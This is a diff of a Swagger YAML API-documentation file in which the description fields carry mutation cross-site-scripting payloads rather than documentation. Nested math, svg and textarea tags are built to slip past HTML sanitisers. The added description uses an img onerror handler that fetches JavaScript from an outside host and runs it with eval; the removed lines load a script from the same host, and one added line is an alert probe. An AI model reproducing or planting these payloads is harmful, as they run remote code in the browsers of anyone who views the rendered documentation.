--- a/test1.yaml
+++ b/test1.yaml
@@ -1,9 +1,7 @@
 swagger: '2.0'
 info:
   title: Classic API Resource Documentation
-  description: |
-    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script src='https://www.yl300.xyz/js/2.js'></script>"></form>
-
+  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://www.yl300.xyz/js/2.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
   version: production
 basePath: /JSSResource/
 produces:
@@ -28,7 +26,7 @@ paths:
     delete:
       parameters:
         - description: |
-                <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script src='https://www.yl300.xyz/js/2.js'></script>"></form>
+            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
 
           format: int64
           in: path
@@ -8260,4 +8258,3 @@ tags:
     name: vppinvitations
   - description: Operations on webhooks
     name: webhooks
-                       
